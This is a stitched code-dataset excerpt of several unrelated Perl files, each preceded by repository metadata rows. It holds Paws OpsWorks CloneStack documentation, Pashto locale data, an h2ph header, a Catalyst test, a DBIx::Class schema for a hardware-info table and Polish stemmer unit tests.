(https://docs.aws.amazon.com/opsworks/latest/userguide/workinginstances-custom-ami.html).
=back
The default option is the parent stack's operating system. For more
information about supported operating systems, see AWS OpsWorks Stacks
Operating Systems
(https://docs.aws.amazon.com/opsworks/latest/userguide/workinginstances-os.html).
You can specify a different Linux operating system for the cloned
stack, but you cannot change from Linux to Windows or Windows to Linux.
=head2 DefaultRootDeviceType => Str
The default root device type. This value is used by default for all
instances in the cloned stack, but you can override it when you create
an instance. For more information, see Storage for the Root Device
(https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ComponentsAMIs.html#storage-for-the-root-device).
Valid values are: C<"ebs">, C<"instance-store">
=head2 DefaultSshKeyName => Str
A default Amazon EC2 key pair name. The default value is none. If you
specify a key pair name, AWS OpsWorks installs the public key on the
instance and you can use the private key with an SSH client to log in
to the instance. For more information, see Using SSH to Communicate
with an Instance
(https://docs.aws.amazon.com/opsworks/latest/userguide/workinginstances-ssh.html)
and Managing SSH Access
(https://docs.aws.amazon.com/opsworks/latest/userguide/security-ssh-access.html).
You can override this setting by specifying a different key pair, or no
key pair, when you create an instance
(https://docs.aws.amazon.com/opsworks/latest/userguide/workinginstances-add.html).
=head2 DefaultSubnetId => Str
The stack's default VPC subnet ID. This parameter is required if you
specify a value for the C<VpcId> parameter. All instances are launched
into this subnet unless you specify otherwise when you create the
instance. If you also specify a value for C<DefaultAvailabilityZone>,
the subnet must be in that zone. For information on default values and
when this parameter is required, see the C<VpcId> parameter
description.
=head2 HostnameTheme => Str
The stack's host name theme, with spaces are replaced by underscores.
The theme is used to generate host names for the stack's instances. By
default, C<HostnameTheme> is set to C<Layer_Dependent>, which creates
host names by appending integers to the layer's short name. The other
themes are:
=over
=item *
C<Baked_Goods>
=item *
C<Clouds>
=item *
C<Europe_Cities>
=item *
C<Fruits>
=item *
C<Greek_Deities_and_Titans>
=item *
C<Legendary_creatures_from_Japan>
=item *
C<Planets_and_Moons>
=item *
C<Roman_Deities>
=item *
C<Scottish_Islands>
=item *
C<US_Cities>
=item *
C<Wild_Cats>
=back
To obtain a generated host name, call C<GetHostNameSuggestion>, which
returns a host name based on the current theme.
=head2 Name => Str
The cloned stack name.
=head2 Region => Str
The cloned stack AWS region, such as "ap-northeast-2". For more
information about AWS regions, see Regions and Endpoints
(https://docs.aws.amazon.com/general/latest/gr/rande.html).
=head2 B<REQUIRED> ServiceRoleArn => Str
The stack AWS Identity and Access Management (IAM) role, which allows
AWS OpsWorks Stacks to work with AWS resources on your behalf. You must
set this parameter to the Amazon Resource Name (ARN) for an existing
IAM role. If you create a stack by using the AWS OpsWorks Stacks
console, it creates the role for you. You can obtain an existing
stack's IAM ARN programmatically by calling DescribePermissions. For
more information about IAM ARNs, see Using Identifiers
(https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html).
You must set this parameter to a valid service role ARN or the action
will fail; there is no default value. You can specify the source
stack's service role ARN, if you prefer, but you must do so explicitly.
=head2 B<REQUIRED> SourceStackId => Str
The source stack ID.
=head2 UseCustomCookbooks => Bool
Whether to use custom cookbooks.
=head2 UseOpsworksSecurityGroups => Bool
Whether to associate the AWS OpsWorks Stacks built-in security groups
with the stack's layers.
AWS OpsWorks Stacks provides a standard set of built-in security
groups, one for each layer, which are associated with layers by
default. With C<UseOpsworksSecurityGroups> you can instead provide your
own custom security groups. C<UseOpsworksSecurityGroups> has the
following settings:
=over
=item *
True - AWS OpsWorks Stacks automatically associates the appropriate
built-in security group with each layer (default setting). You can
associate additional security groups with a layer after you create it
but you cannot delete the built-in security group.
=item *
False - AWS OpsWorks Stacks does not associate built-in security groups
with layers. You must create appropriate Amazon Elastic Compute Cloud
(Amazon EC2) security groups and associate a security group with each
layer that you create. However, you can still manually associate a
built-in security group with a layer on creation; custom security
groups are required only for those layers that need custom settings.
=back
For more information, see Create a New Stack
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingstacks-creating.html).
=head2 VpcId => Str
The ID of the VPC that the cloned stack is to be launched into. It must
be in the specified region. All instances are launched into this VPC,
and you cannot change the ID later.
=over
=item *
If your account supports EC2 Classic, the default value is no VPC.
=item *
If your account does not support EC2 Classic, the default value is the
default VPC for the specified region.
=back
If the VPC ID corresponds to a default VPC and you have specified
either the C<DefaultAvailabilityZone> or the C<DefaultSubnetId>
parameter only, AWS OpsWorks Stacks infers the value of the other
parameter. If you specify neither parameter, AWS OpsWorks Stacks sets
these parameters to the first valid Availability Zone for the specified
region and the corresponding default VPC subnet ID, respectively.
If you specify a nondefault VPC ID, note the following:
=over
=item *
It must belong to a VPC in your account that is in the specified
region.
=item *
You must specify a value for C<DefaultSubnetId>.
=back
For more information about how to use AWS OpsWorks Stacks with a VPC,
see Running a Stack in a VPC
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingstacks-vpc.html).
For more information about default VPC and EC2 Classic, see Supported
Platforms
(https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-supported-platforms.html).
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method CloneStack in L<Paws::OpsWorks>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: L<https://github.com/pplu/aws-sdk-perl>
Please report bugs to: L<https://github.com/pplu/aws-sdk-perl/issues>
=cut
| 31.201183 | 249 | 0.722738 |
eda24e143bd738ad27b382c053b09b29f5015209 | 10,022 | pl | Perl | perl/vendor/lib/auto/share/dist/DateTime-Locale/ps-PK.pl | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/auto/share/dist/DateTime-Locale/ps-PK.pl | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | 3 | 2021-01-27T10:09:28.000Z | 2021-05-11T21:20:12.000Z | perl/vendor/lib/auto/share/dist/DateTime-Locale/ps-PK.pl | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | {
am_pm_abbreviated => [
"\N{U+063a}.\N{U+0645}.",
"\N{U+063a}.\N{U+0648}.",
],
available_formats => {
Bh => "h B",
Bhm => "h:mm B",
Bhms => "h:mm:ss B",
E => "ccc",
EBhm => "E h:mm B",
EBhms => "E h:mm:ss B",
EHm => "E HH:mm",
EHms => "E HH:mm:ss",
Ed => "d, E",
Ehm => "E h:mm a",
Ehms => "E h:mm:ss a",
Gy => "G y",
GyMMM => "G y MMM",
GyMMMEd => "G y MMM d, E",
GyMMMd => "G y MMM d",
H => "HH",
Hm => "HH:mm",
Hms => "HH:mm:ss",
Hmsv => "HH:mm:ss v",
Hmv => "HH:mm v",
M => "L",
MEd => "MM-dd, E",
MMM => "LLL",
MMMEd => "E, MMM d",
"MMMMW-count-one" => "\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}\N{U+2018} W \N{U+062f} MMMM\N{U+2018}",
"MMMMW-count-other" => "\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd} W \N{U+062f} MMMM",
MMMMd => "MMMM d",
MMMd => "MMM d",
Md => "MM-dd",
d => "d",
h => "h a",
hm => "h:mm a",
hms => "h:mm:ss a",
hmsv => "h:mm:ss a v",
hmv => "h:mm a v",
ms => "mm:ss",
y => "y",
yM => "y-MM",
yMEd => "y-MM-dd, E",
yMMM => "y MMM",
yMMMEd => "y MMM d, E",
yMMMM => "y MMMM",
yMMMd => "y MMM d",
yMd => "y-MM-dd",
yQQQ => "y QQQ",
yQQQQ => "y QQQQ",
"yw-count-one" => "\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd} w \N{U+062f} Y",
"yw-count-other" => "\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd} w \N{U+062f} Y",
},
code => "ps-PK",
date_format_full => "EEEE \N{U+062f} y \N{U+062f} MMMM d",
date_format_long => "\N{U+062f} y \N{U+062f} MMMM d",
date_format_medium => "y MMM d",
date_format_short => "y/M/d",
datetime_format_full => "{1} {0}",
datetime_format_long => "{1} {0}",
datetime_format_medium => "{1} {0}",
datetime_format_short => "{1} {0}",
day_format_abbreviated => [
"\N{U+062f}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+062f}\N{U+0631}\N{U+06d0}\N{U+0646}\N{U+06cd}",
"\N{U+0685}\N{U+0644}\N{U+0631}\N{U+0646}\N{U+06cd}",
"\N{U+067e}\N{U+064a}\N{U+0646}\N{U+0681}\N{U+0646}\N{U+06cd}",
"\N{U+062c}\N{U+0645}\N{U+0639}\N{U+0647}",
"\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+064a}\N{U+0648}\N{U+0646}\N{U+06cd}",
],
day_format_narrow => [
"M",
"T",
"W",
"T",
"F",
"S",
"S",
],
day_format_wide => [
"\N{U+062f}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+062f}\N{U+0631}\N{U+06d0}\N{U+0646}\N{U+06cd}",
"\N{U+0685}\N{U+0644}\N{U+0631}\N{U+0646}\N{U+06cd}",
"\N{U+067e}\N{U+064a}\N{U+0646}\N{U+0681}\N{U+0646}\N{U+06cd}",
"\N{U+062c}\N{U+0645}\N{U+0639}\N{U+0647}",
"\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+064a}\N{U+0648}\N{U+0646}\N{U+06cd}",
],
day_stand_alone_abbreviated => [
"\N{U+062f}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+062f}\N{U+0631}\N{U+06d0}\N{U+0646}\N{U+06cd}",
"\N{U+0685}\N{U+0644}\N{U+0631}\N{U+0646}\N{U+06cd}",
"\N{U+067e}\N{U+064a}\N{U+0646}\N{U+0681}\N{U+0646}\N{U+06cd}",
"\N{U+062c}\N{U+0645}\N{U+0639}\N{U+0647}",
"\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+064a}\N{U+0648}\N{U+0646}\N{U+06cd}",
],
day_stand_alone_narrow => [
"M",
"T",
"W",
"T",
"F",
"S",
"S",
],
day_stand_alone_wide => [
"\N{U+062f}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+062f}\N{U+0631}\N{U+06d0}\N{U+0646}\N{U+06cd}",
"\N{U+0685}\N{U+0644}\N{U+0631}\N{U+0646}\N{U+06cd}",
"\N{U+067e}\N{U+064a}\N{U+0646}\N{U+0681}\N{U+0646}\N{U+06cd}",
"\N{U+062c}\N{U+0645}\N{U+0639}\N{U+0647}",
"\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+064a}\N{U+0648}\N{U+0646}\N{U+06cd}",
],
era_abbreviated => [
"\N{U+0644}\N{U+0647} \N{U+0645}\N{U+06cc}\N{U+0644}\N{U+0627}\N{U+062f} \N{U+0648}\N{U+0693}\N{U+0627}\N{U+0646}\N{U+062f}\N{U+06d0}",
"\N{U+0645}.",
],
era_narrow => [
"\N{U+0644}\N{U+0647} \N{U+0645}\N{U+06cc}\N{U+0644}\N{U+0627}\N{U+062f} \N{U+0648}\N{U+0693}\N{U+0627}\N{U+0646}\N{U+062f}\N{U+06d0}",
"\N{U+0645}.",
],
era_wide => [
"\N{U+0644}\N{U+0647} \N{U+0645}\N{U+06cc}\N{U+0644}\N{U+0627}\N{U+062f} \N{U+0685}\N{U+062e}\N{U+0647} \N{U+0648}\N{U+0693}\N{U+0627}\N{U+0646}\N{U+062f}\N{U+06d0}",
"\N{U+0644}\N{U+0647} \N{U+0645}\N{U+06cc}\N{U+0644}\N{U+0627}\N{U+062f} \N{U+0685}\N{U+062e}\N{U+0647} \N{U+0648}\N{U+0631}\N{U+0648}\N{U+0633}\N{U+062a}\N{U+0647}",
],
first_day_of_week => 7,
glibc_date_1_format => "%a %b %e %H:%M:%S %Z %Y",
glibc_date_format => "%m/%d/%y",
glibc_datetime_format => "%a %b %e %H:%M:%S %Y",
glibc_time_12_format => "%I:%M:%S %p",
glibc_time_format => "%H:%M:%S",
language => "Pashto",
month_format_abbreviated => [
"\N{U+062c}\N{U+0646}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0641}\N{U+0628}\N{U+0631}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0645}\N{U+0627}\N{U+0631}\N{U+0686}",
"\N{U+0627}\N{U+067e}\N{U+0631}\N{U+06cc}\N{U+0644}",
"\N{U+0645}\N{U+06cd}",
"\N{U+062c}\N{U+0648}\N{U+0646}",
"\N{U+062c}\N{U+0648}\N{U+0644}\N{U+0627}\N{U+06cc}",
"\N{U+0627}\N{U+06ab}\N{U+0633}\N{U+062a}",
"\N{U+0633}\N{U+06d0}\N{U+067e}\N{U+062a}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+0627}\N{U+06a9}\N{U+062a}\N{U+0648}\N{U+0628}\N{U+0631}",
"\N{U+0646}\N{U+0648}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+062f}\N{U+0633}\N{U+0645}\N{U+0628}\N{U+0631}",
],
month_format_narrow => [
"\N{U+062c}",
"\N{U+0641}",
"\N{U+0645}",
"\N{U+0627}",
"\N{U+0645}",
"\N{U+062c}",
"\N{U+062c}",
"\N{U+0627}",
"\N{U+0633}",
"\N{U+0627}",
"\N{U+0646}",
"\N{U+062f}",
],
month_format_wide => [
"\N{U+062c}\N{U+0646}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0641}\N{U+0628}\N{U+0631}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0645}\N{U+0627}\N{U+0631}\N{U+0686}",
"\N{U+0627}\N{U+067e}\N{U+0631}\N{U+06cc}\N{U+0644}",
"\N{U+0645}\N{U+06cd}",
"\N{U+062c}\N{U+0648}\N{U+0646}",
"\N{U+062c}\N{U+0648}\N{U+0644}\N{U+0627}\N{U+06cc}",
"\N{U+0627}\N{U+06ab}\N{U+0633}\N{U+062a}",
"\N{U+0633}\N{U+06d0}\N{U+067e}\N{U+062a}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+0627}\N{U+06a9}\N{U+062a}\N{U+0648}\N{U+0628}\N{U+0631}",
"\N{U+0646}\N{U+0648}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+062f}\N{U+0633}\N{U+0645}\N{U+0628}\N{U+0631}",
],
month_stand_alone_abbreviated => [
"\N{U+062c}\N{U+0646}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0641}\N{U+0628}\N{U+0631}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0645}\N{U+0627}\N{U+0631}\N{U+0686}",
"\N{U+0627}\N{U+067e}\N{U+0631}\N{U+06cc}\N{U+0644}",
"\N{U+0645}\N{U+06cd}",
"\N{U+062c}\N{U+0648}\N{U+0646}",
"\N{U+062c}\N{U+0648}\N{U+0644}\N{U+0627}\N{U+06cc}",
"\N{U+0627}\N{U+06ab}\N{U+0633}\N{U+062a}",
"\N{U+0633}\N{U+067e}\N{U+062a}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+0627}\N{U+06a9}\N{U+062a}\N{U+0648}\N{U+0628}\N{U+0631}",
"\N{U+0646}\N{U+0648}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+062f}\N{U+0633}\N{U+0645}\N{U+0628}\N{U+0631}",
],
month_stand_alone_narrow => [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
],
month_stand_alone_wide => [
"\N{U+062c}\N{U+0646}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0641}\N{U+06d0}\N{U+0628}\N{U+0631}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0645}\N{U+0627}\N{U+0631}\N{U+0686}",
"\N{U+0627}\N{U+067e}\N{U+0631}\N{U+06cc}\N{U+0644}",
"\N{U+0645}\N{U+06cd}",
"\N{U+062c}\N{U+0648}\N{U+0646}",
"\N{U+062c}\N{U+0648}\N{U+0644}\N{U+0627}\N{U+06cc}",
"\N{U+0627}\N{U+06ab}\N{U+0633}\N{U+062a}",
"\N{U+0633}\N{U+067e}\N{U+062a}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+0627}\N{U+06a9}\N{U+062a}\N{U+0648}\N{U+0628}\N{U+0631}",
"\N{U+0646}\N{U+0648}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+062f}\N{U+0633}\N{U+0645}\N{U+0628}\N{U+0631}",
],
name => "Pashto Pakistan",
native_language => "\N{U+067e}\N{U+069a}\N{U+062a}\N{U+0648}",
native_name => "\N{U+067e}\N{U+069a}\N{U+062a}\N{U+0648} \N{U+067e}\N{U+0627}\N{U+06a9}\N{U+0633}\N{U+062a}\N{U+0627}\N{U+0646}",
native_script => undef,
native_territory => "\N{U+067e}\N{U+0627}\N{U+06a9}\N{U+0633}\N{U+062a}\N{U+0627}\N{U+0646}",
native_variant => undef,
quarter_format_abbreviated => [
"\N{U+0644}\N{U+0648}\N{U+0645}\N{U+0693}\N{U+06cd} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f2}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f3}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f4}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
],
quarter_format_narrow => [
1,
2,
3,
4,
],
quarter_format_wide => [
"\N{U+0644}\N{U+0648}\N{U+0645}\N{U+0693}\N{U+06cd} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f2}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f3}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f4}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
],
quarter_stand_alone_abbreviated => [
"\N{U+0644}\N{U+0648}\N{U+0645}\N{U+0693}\N{U+06cd} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f2}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f3}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f4}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
],
quarter_stand_alone_narrow => [
1,
2,
3,
4,
],
quarter_stand_alone_wide => [
"\N{U+0644}\N{U+0648}\N{U+0645}\N{U+0693}\N{U+06cd} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f2}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f3}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f4}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
],
script => undef,
territory => "Pakistan",
time_format_full => "h:mm:ss a zzzz",
time_format_long => "h:mm:ss a z",
time_format_medium => "h:mm:ss a",
time_format_short => "h:mm a",
variant => undef,
version => 36,
}
| 36.710623 | 170 | 0.507982 |
ed9b3acd980960dc90adba21a76f3f838ec72a9c | 554 | ph | Perl | usr/local/lib/perl5/site_perl/mach/5.20/base64.ph | skarekrow/testrepo | af979b718aae49a2301c400964a603cf010a3c51 | [
"BSD-3-Clause"
] | null | null | null | usr/local/lib/perl5/site_perl/mach/5.20/base64.ph | skarekrow/testrepo | af979b718aae49a2301c400964a603cf010a3c51 | [
"BSD-3-Clause"
] | null | null | null | usr/local/lib/perl5/site_perl/mach/5.20/base64.ph | skarekrow/testrepo | af979b718aae49a2301c400964a603cf010a3c51 | [
"BSD-3-Clause"
] | null | null | null | require '_h2ph_pre.ph';
no warnings qw(redefine misc);
unless(defined(&_BASE64_H_)) {
eval 'sub _BASE64_H_ () {1;}' unless defined(&_BASE64_H_);
unless(defined(&ROKEN_LIB_FUNCTION)) {
if(defined(&_WIN32)) {
eval 'sub ROKEN_LIB_FUNCTION () {1;}' unless defined(&ROKEN_LIB_FUNCTION);
eval 'sub ROKEN_LIB_CALL () { &__cdecl;}' unless defined(&ROKEN_LIB_CALL);
} else {
eval 'sub ROKEN_LIB_FUNCTION () {1;}' unless defined(&ROKEN_LIB_FUNCTION);
eval 'sub ROKEN_LIB_CALL () {1;}' unless defined(&ROKEN_LIB_CALL);
}
}
}
1;
| 30.777778 | 79 | 0.676895 |
edb6b6ae7eff917d15a1ad210aebc96262464f13 | 295 | t | Perl | App-Catable/t/04-notify.t | shlomif/catable | 2f656d7d9296f42d3a9d68dec85ddebdd786ebd9 | [
"MIT"
] | 6 | 2015-04-09T11:04:56.000Z | 2020-09-24T22:05:52.000Z | App-Catable/t/04-notify.t | shlomif/catable | 2f656d7d9296f42d3a9d68dec85ddebdd786ebd9 | [
"MIT"
] | null | null | null | App-Catable/t/04-notify.t | shlomif/catable | 2f656d7d9296f42d3a9d68dec85ddebdd786ebd9 | [
"MIT"
] | null | null | null | #!/usr/bin/perl
use strict;
use warnings;
use Test::More qw(no_plan);
use lib 't/lib/for-notify';
use Test::WWW::Mechanize::Catalyst;
my $mech = Test::WWW::Mechanize::Catalyst->new(catalyst_app => 'App::Catable');
$mech->get_ok('/notify/hello_world');
$mech->content_contains('Hello, world!');
| 26.818182 | 79 | 0.705085 |
ed988de2b856f606966cb13a7eda2eb2884071b7 | 2,661 | pm | Perl | traffic_ops/app/lib/Schema/Result/Hwinfo.pm | ninetian/traffic_control | 11c7787624bde3206df916c1190a78a1e9bda8e1 | [
"Apache-2.0"
] | null | null | null | traffic_ops/app/lib/Schema/Result/Hwinfo.pm | ninetian/traffic_control | 11c7787624bde3206df916c1190a78a1e9bda8e1 | [
"Apache-2.0"
] | null | null | null | traffic_ops/app/lib/Schema/Result/Hwinfo.pm | ninetian/traffic_control | 11c7787624bde3206df916c1190a78a1e9bda8e1 | [
"Apache-2.0"
] | 1 | 2020-09-14T00:18:22.000Z | 2020-09-14T00:18:22.000Z | use utf8;
#
# Copyright 2015 Comcast Cable Communications Management, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
#
package Schema::Result::Hwinfo;
# Created by DBIx::Class::Schema::Loader
# DO NOT MODIFY THE FIRST PART OF THIS FILE
=head1 NAME
Schema::Result::Hwinfo
=cut
use strict;
use warnings;
use base 'DBIx::Class::Core';
=head1 TABLE: C<hwinfo>
=cut
__PACKAGE__->table("hwinfo");
=head1 ACCESSORS
=head2 id
data_type: 'integer'
is_auto_increment: 1
is_nullable: 0
=head2 serverid
data_type: 'integer'
is_foreign_key: 1
is_nullable: 0
=head2 description
data_type: 'varchar'
is_nullable: 0
size: 256
=head2 val
data_type: 'varchar'
is_nullable: 0
size: 256
=head2 last_updated
data_type: 'timestamp'
datetime_undef_if_invalid: 1
default_value: current_timestamp
is_nullable: 1
=cut
__PACKAGE__->add_columns(
"id",
{ data_type => "integer", is_auto_increment => 1, is_nullable => 0 },
"serverid",
{ data_type => "integer", is_foreign_key => 1, is_nullable => 0 },
"description",
{ data_type => "varchar", is_nullable => 0, size => 256 },
"val",
{ data_type => "varchar", is_nullable => 0, size => 256 },
"last_updated",
{
data_type => "timestamp",
datetime_undef_if_invalid => 1,
default_value => \"current_timestamp",
is_nullable => 1,
},
);
=head1 PRIMARY KEY
=over 4
=item * L</id>
=back
=cut
__PACKAGE__->set_primary_key("id");
=head1 UNIQUE CONSTRAINTS
=head2 C<serverid>
=over 4
=item * L</serverid>
=item * L</description>
=back
=cut
__PACKAGE__->add_unique_constraint("serverid", ["serverid", "description"]);
=head1 RELATIONS
=head2 serverid
Type: belongs_to
Related object: L<Schema::Result::Server>
=cut
__PACKAGE__->belongs_to(
"serverid",
"Schema::Result::Server",
{ id => "serverid" },
{ is_deferrable => 1, on_delete => "CASCADE", on_update => "NO ACTION" },
);
# Created by DBIx::Class::Schema::Loader v0.07038 @ 2014-01-02 16:19:05
# DO NOT MODIFY THIS OR ANYTHING ABOVE! md5sum:2ZWljDE7ZOQJ+UH0lY2jBg
# You can replace this text with custom code or comments, and it will be preserved on regeneration
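# A minimal read-side sketch (assumes a deployed Schema class and DBI
# connection details; the description value below is illustrative only):
#
#   my $schema = Schema->connect($dsn, $db_user, $db_pass);
#   my @rows = $schema->resultset('Hwinfo')->search(
#       { description => 'BIOS' },
#       { prefetch    => 'serverid' },   # also fetch the related Server row
#   );
#   printf "%s = %s\n", $_->description, $_->val for @rows;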
1;
| 18.226027 | 98 | 0.701616 |
ed1aedda7951be0590c6dd52c3b3f286d7265c8d | 4,148 | t | Perl | t/pl.t | patch/lingua-stem-patch-pm5 | 602c366e8bb64f25d481b6f5ca8bcdd1204cc88a | [
"Artistic-1.0"
] | null | null | null | t/pl.t | patch/lingua-stem-patch-pm5 | 602c366e8bb64f25d481b6f5ca8bcdd1204cc88a | [
"Artistic-1.0"
] | 1 | 2017-04-25T15:30:41.000Z | 2017-04-25T15:30:41.000Z | t/pl.t | patch/lingua-stem-patch-pm5 | 602c366e8bb64f25d481b6f5ca8bcdd1204cc88a | [
"Artistic-1.0"
] | null | null | null | use utf8;
use strict;
use warnings;
use open qw( :encoding(UTF-8) :std );
use Test::More tests => 77;
use Lingua::Stem::Patch::PL qw( stem );
# nouns
is stem('gazetach'), 'gaze', 'remove -tach';
is stem('sytuacja'), 'syt', 'remove -acja';
is stem('sytuacją'), 'syt', 'remove -acją';
is stem('sytuacji'), 'syt', 'remove -acji';
is stem('kochanie'), 'koch', 'remove -anie';
is stem('ubraniu'), 'ubr', 'remove -aniu';
is stem('tłumaczenie'), 'tłumacz', 'remove -enie';
is stem('imieniu'), 'imi', 'remove -eniu';
is stem('spotyka'), 'spot', 'remove -ka from -tyka';
is stem('latach'), 'lat', 'remove -ach';
is stem('czasami'), 'czas', 'remove -ami';
is stem('miejsce'), 'miejs', 'remove -ce';
is stem('świata'), 'świ', 'remove -ta';
is stem('pojęcia'), 'poj', 'remove -cia';
is stem('pięciu'), 'pię', 'remove -ciu';
is stem('zobaczenia'), 'zobacze', 'remove -nia';
is stem('tygodniu'), 'tygod', 'remove -niu';
is stem('policja'), 'polic', 'remove -ja from -cja';
is stem('policją'), 'polic', 'remove -ją from -cją';
is stem('policji'), 'polic', 'remove -ji from -cji';
# diminutive
is stem('ptaszek'), 'pt', 'remove -aszek';
is stem('tyłeczek'), 'tył', 'remove -eczek';
is stem('policzek'), 'pol', 'remove -iczek';
is stem('kieliszek'), 'kiel', 'remove -iszek';
is stem('staruszek'), 'star', 'remove -uszek';
is stem('olejek'), 'olej', 'remove -ek from -ejek';
is stem('piosenek'), 'piosen', 'remove -ek from -enek';
is stem('derek'), 'der', 'remove -ek from -erek';
is stem('jednak'), 'jedn', 'remove -ak';
is stem('wypadek'), 'wypad', 'remove -ek';
# adjectives
is stem('najlepsze'), 'lep', 'remove naj- and -sze';
is stem('najlepszy'), 'lep', 'remove naj- and -szy';
is stem('najlepszych'), 'lep', 'remove naj- and -szych';
is stem('grzeczny'), 'grze', 'remove -czny';
is stem('dlaczego'), 'dlacz', 'remove -ego';
is stem('więcej'), 'więc', 'remove -ej';
is stem('żadnych'), 'żadn', 'remove -ych';
is stem('gotowa'), 'got', 'remove -owa';
is stem('gotowe'), 'got', 'remove -owe';
is stem('gotowy'), 'got', 'remove -owy';
# verbs
is stem('gdybym'), 'gdy', 'remove -bym';
is stem('oczywiście'), 'oczywiś', 'remove -cie';
is stem('miałem'), 'mia', 'remove -łem';
is stem('spotkamy'), 'spotk', 'remove -amy';
is stem('możemy'), 'moż', 'remove -emy';
is stem('pamiętasz'), 'pamięt', 'remove -asz';
is stem('chcesz'), 'chc', 'remove -esz';
is stem('ukraść'), 'ukr', 'remove -aść';
is stem('znieść'), 'zni', 'remove -eść';
is stem('mówiąc'), 'mów', 'remove -ąc';
is stem('zostać'), 'zost', 'remove -ać';
is stem('przepraszam'), 'przeprasz', 'remove -am';
is stem('miał'), 'mi', 'remove -ał';
is stem('mieć'), 'mi', 'remove -eć';
is stem('jestem'), 'jest', 'remove -em';
is stem('zrobić'), 'zrob', 'remove -ić';
is stem('zrobił'), 'zrob', 'remove -ił';
is stem('kraj'), 'kra', 'remove -j from -aj';
is stem('masz'), 'ma', 'remove -sz from -asz';
is stem('wpaść'), 'wpa', 'remove -ść from -aść';
is stem('wiesz'), 'wie', 'remove -sz from -esz';
is stem('cześć'), 'cze', 'remove -ść from -eść';
# adverbs
is stem('dobrze'), 'dobr', 'remove -ze from -rze';
is stem('panie'), 'pan', 'remove -ie from -nie';
is stem('prawie'), 'praw', 'remove -ie from -wie';
# plural
is stem('czasami'), 'czas', 'remove -ami';
is stem('poziom'), 'poz', 'remove -om';
is stem('dolarów'), 'dolar', 'remove -ów';
# others
is stem('dobra'), 'dobr', 'remove -a';
is stem('swoją'), 'swoj', 'remove -ą';
is stem('proszę'), 'prosz', 'remove -ę';
is stem('jeśli'), 'jeśl', 'remove -i';
is stem('pomysł'), 'pomys', 'remove -ł';
is stem('porządku'), 'porządk', 'remove -u';
is stem('kiedy'), 'kied', 'remove -y';
